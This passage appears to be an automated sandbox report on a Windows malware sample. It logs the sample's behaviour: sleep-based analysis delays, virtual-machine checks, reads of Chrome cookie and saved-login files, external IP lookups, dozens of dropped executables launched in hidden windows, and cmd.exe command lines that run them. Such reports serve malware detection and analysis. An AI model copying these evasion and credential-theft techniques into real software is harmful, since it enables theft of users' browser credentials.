NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00163000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00164000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00165000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 8:58 a.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (3 events)

description	ww15_testLL_0310_single.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
description	BumperWW.exe tried to sleep 122 seconds, actually delayed analysis time by 122 seconds
description	Lixygaevymi.exe tried to sleep 250 seconds, actually delayed analysis time by 250 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (7 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Nov. 5, 2021, 8:59 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 8845791232 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW Nov. 5, 2021, 9:07 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW Nov. 5, 2021, 9:07 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW Nov. 5, 2021, 9:07 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW Nov. 5, 2021, 9:07 a.m.	total_number_of_free_bytes: 9219698688 free_bytes_available: 9219698688 root_path: \\?\C:\Users\test22\AppData\Roaming\ total_number_of_bytes: 9219698688	1	1
GetDiskFreeSpaceExW Nov. 5, 2021, 9:07 a.m.	total_number_of_free_bytes: 9219489792 free_bytes_available: 9219489792 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\ total_number_of_bytes: 9219489792	1	1
GetDiskFreeSpaceExW Nov. 5, 2021, 9:07 a.m.	total_number_of_free_bytes: 9214152704 free_bytes_available: 9214152704 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\ total_number_of_bytes: 9214152704	1	1

Steals private information from local Internet browsers (50 out of 109 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies

Looks up the external IP address (2 events)

domain	ipinfo.io
domain	ip-api.com

Creates executable files on the filesystem (35 events)

file	C:\Users\test22\AppData\Roaming\proliv041.exe
file	C:\Users\test22\Pictures\Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe
file	C:\Program Files\Windows Defender\EOUZNQTEXE\foldershare.exe
file	C:\Users\test22\Pictures\Adobe Films\Fb7m5lwjGGqZjFSI1NI5IT0S.exe
file	C:\Program Files (x86)\Company\NewProduct\cutm3.exe
file	C:\Users\test22\Pictures\Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe
file	C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\Pictures\Adobe Films\gnTt31FBU2RkXESFsLvMLV95.exe
file	C:\Users\test22\Pictures\Adobe Films\2EEBa_J1cdykvsX9ogWTty98.exe
file	C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe
file	C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\DYbALA.exe
file	C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\idp.dll
file	C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
file	C:\Users\test22\Pictures\Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe
file	C:\Users\test22\Pictures\Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe
file	C:\Users\test22\Pictures\Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe
file	C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe
file	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
file	C:\Users\test22\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
file	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
file	C:\Users\test22\Documents\T9aZunTSaNJLBVfIkgF5mtQo.dll
file	C:\Users\test22\AppData\Roaming\Underdress.exe
file	C:\Users\test22\Pictures\Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe
file	C:\Users\test22\Pictures\Adobe Films\PagDyspdvNDek1mPUjFhavf9.exe
file	C:\Users\test22\Pictures\Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe
file	C:\Users\test22\Pictures\Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe
file	C:\Users\test22\Pictures\Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe
file	C:\Users\test22\Pictures\Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe
file	C:\Users\test22\Pictures\Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe
file	C:\Users\test22\Pictures\Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe
file	C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi
file	C:\Users\test22\Pictures\Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe
file	C:\Users\test22\Pictures\Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe
file	C:\Program Files (x86)\Microsoft Analysis Services\Xibijozhana.exe
file	C:\Users\test22\Pictures\Adobe Films\v86hR6bOp_cjN_kGHlJ96iWJ.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk

Creates a suspicious process (15 events)

cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\wdg0lsza.mbf\BumperWW.exe & exit
cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\mnykrj0q.fnf\installer.exe /qn CAMPAIGN=654 & exit
cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\cxkdphvb.w33\any.exe & exit
cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\tx20rfg2.f30\customer51.exe & exit
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\cxkdphvb.w33\any.exe & exit
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\mnykrj0q.fnf\installer.exe /qn CAMPAIGN=654 & exit
cmdline	cmd.exe /c taskkill /f /im chrome.exe
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\3a4dsbox.5nj\ww15_testLL_0310_single.exe & exit
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\wdg0lsza.mbf\BumperWW.exe & exit
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\tx20rfg2.f30\customer51.exe & exit
cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\3a4dsbox.5nj\ww15_testLL_0310_single.exe & exit
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\wpr4byow.xse\gcleaner.exe /mixfive & exit
cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\wpr4byow.xse\gcleaner.exe /mixfive & exit
cmdline	cmd.exe /k C:\Users\test22\AppData\Local\Temp\0euy33ek.tqo\autosubplayer.exe /S & exit
cmdline	"C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\0euy33ek.tqo\autosubplayer.exe /S & exit

Drops a binary and executes it (22 events)

file	C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe
file	C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe
file	C:\Program Files\Windows Defender\EOUZNQTEXE\foldershare.exe
file	C:\Users\test22\Pictures\Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe
file	C:\Users\test22\Pictures\Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe
file	C:\Users\test22\Pictures\Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe
file	C:\Users\test22\Pictures\Adobe Films\Fb7m5lwjGGqZjFSI1NI5IT0S.exe
file	C:\Users\test22\Pictures\Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe
file	C:\Users\test22\Pictures\Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe
file	C:\Users\test22\Pictures\Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe
file	C:\Users\test22\Pictures\Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe
file	C:\Users\test22\Pictures\Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe
file	C:\Users\test22\Pictures\Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe
file	C:\Users\test22\Pictures\Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe
file	C:\Users\test22\Pictures\Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe
file	C:\Users\test22\Pictures\Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe
file	C:\Users\test22\Pictures\Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe
file	C:\Users\test22\Pictures\Adobe Films\PagDyspdvNDek1mPUjFhavf9.exe
file	C:\Users\test22\Pictures\Adobe Films\gnTt31FBU2RkXESFsLvMLV95.exe
file	C:\Users\test22\Pictures\Adobe Films\2EEBa_J1cdykvsX9ogWTty98.exe
file	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
file	C:\Program Files (x86)\Company\NewProduct\cutm3.exe

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe
file	C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe
file	C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\DYbALA.exe
file	C:\Users\test22\AppData\Local\Temp\is-0EQ3T.tmp\kak.tmp
file	C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
file	C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\idp.dll
file	C:\Users\test22\AppData\Roaming\Underdress.exe
file	C:\Users\test22\AppData\Roaming\proliv041.exe

A process created a hidden window (42 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Nov. 5, 2021, 8:59 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\wdg0lsza.mbf\BumperWW.exe & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 8:59 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\3a4dsbox.5nj\ww15_testLL_0310_single.exe & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 8:59 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\cxkdphvb.w33\any.exe & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 8:59 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\tx20rfg2.f30\customer51.exe & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\wpr4byow.xse\gcleaner.exe /mixfive & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\0euy33ek.tqo\autosubplayer.exe /S & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /k C:\Users\test22\AppData\Local\Temp\mnykrj0q.fnf\installer.exe /qn CAMPAIGN=654 & exit filepath: cmd.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Fb7m5lwjGGqZjFSI1NI5IT0S.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Fb7m5lwjGGqZjFSI1NI5IT0S.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\PagDyspdvNDek1mPUjFhavf9.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\PagDyspdvNDek1mPUjFhavf9.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Fb7m5lwjGGqZjFSI1NI5IT0S.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Fb7m5lwjGGqZjFSI1NI5IT0S.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\gnTt31FBU2RkXESFsLvMLV95.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\gnTt31FBU2RkXESFsLvMLV95.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe		0
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Adobe Films\2EEBa_J1cdykvsX9ogWTty98.exe parameters: filepath: C:\Users\test22\Pictures\Adobe Films\2EEBa_J1cdykvsX9ogWTty98.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe parameters: filepath: C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	1	1
ShellExecuteExW Nov. 5, 2021, 9:07 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\Company\NewProduct\cutm3.exe parameters: filepath: C:\Program Files (x86)\Company\NewProduct\cutm3.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 137 events)

Time & API	Arguments	Status	Return
Process32FirstW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: [System Process] process_identifier: 0	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: System process_identifier: 4	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: smss.exe process_identifier: 232	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: csrss.exe process_identifier: 312	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: wininit.exe process_identifier: 340	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: csrss.exe process_identifier: 364	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: winlogon.exe process_identifier: 404	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: services.exe process_identifier: 440	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: lsass.exe process_identifier: 456	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: lsm.exe process_identifier: 464	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 576	1	1
